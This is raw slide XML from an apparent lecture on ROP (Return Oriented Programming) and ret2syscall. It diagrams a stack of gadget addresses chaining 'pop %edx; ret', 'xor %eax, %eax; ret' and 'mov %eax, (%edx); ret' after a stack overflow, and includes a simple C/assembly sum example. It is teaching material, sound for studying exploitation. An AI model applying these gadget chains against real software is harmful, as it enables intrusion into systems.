                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1659" name="Shape 1659"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABBB589C-512D-4FE0-BA5C-C41D69DB67FD}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E913141E-802B-42B5-8306-4FDB9A8CEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588"/>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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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663"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1665" name="Shape 1665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1666" name="Shape 1666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>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value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1667" name="Shape 1667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>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0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1668" name="Shape 1668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1669" name="Shape 1669"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="35812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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1670" name="Shape 1670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="35812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xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1671" name="Shape 1671"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="3581200" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1672" name="Shape 1672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="1341000"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1673" name="Shape 1673"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="1545800"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1674" name="Shape 1674"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="35812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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1675" name="Shape 1675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1674" idx="0"/>
            <a:endCxn id="1669" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="375200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1676" name="Shape 1676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1669" idx="0"/>
            <a:endCxn id="1670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="1145200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1677" name="Shape 1677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1670" idx="0"/>
            <a:endCxn id="1671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="332800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1678" name="Shape 1678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1665" idx="1"/>
            <a:endCxn id="1669" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1679" name="Shape 1679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1667" idx="1"/>
            <a:endCxn id="1670" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="27600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1680" name="Shape 1680"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1668" idx="1"/>
            <a:endCxn id="1671" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1681" name="Shape 1681"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="4001567"/>
            <a:ext cx="2165200" cy="4096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%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1682" name="Shape 1682"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="2852900"/>
            <a:ext cx="2165200" cy="4096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%eax = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1683" name="Shape 1683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="1900133"/>
            <a:ext cx="3050000" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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*(int *)value = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1684" name="Shape 1684"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207373" y="2104927"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1685" name="Shape 1685"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310107" y="1900127"/>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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1686" name="Shape 1686"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>
            <a:ext cx="2095200" cy="763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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1687" name="Shape 1687"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849733" y="1900133"/>
            <a:ext cx="3050000" cy="4096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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D278550D-848D-45BC-BEB4-45E8FD53970C}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B214AF52-0E71-4BCF-ABCE-8A6160771637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588"/>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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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hape 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9E4A5D-AFFC-48AE-A4BF-D19AF8E3AC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466716" y="2801976"/>
            <a:ext cx="2861362" cy="1676077"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sum:</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push ebp</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mov ebp, esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov eax, [ebp+12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add eax, [ebp+8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A9693D-1A5B-4E5E-A51B-AAAE2A96A437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894987" y="2943504"/>
            <a:ext cx="2861362" cy="1393021"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int sum(int x, int y)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</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int t = x + y;</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 sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>return t;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549B3D12-28A7-40B0-92F4-EE1F883F00A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3756349" y="3640015"/>
            <a:ext cx="710367" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
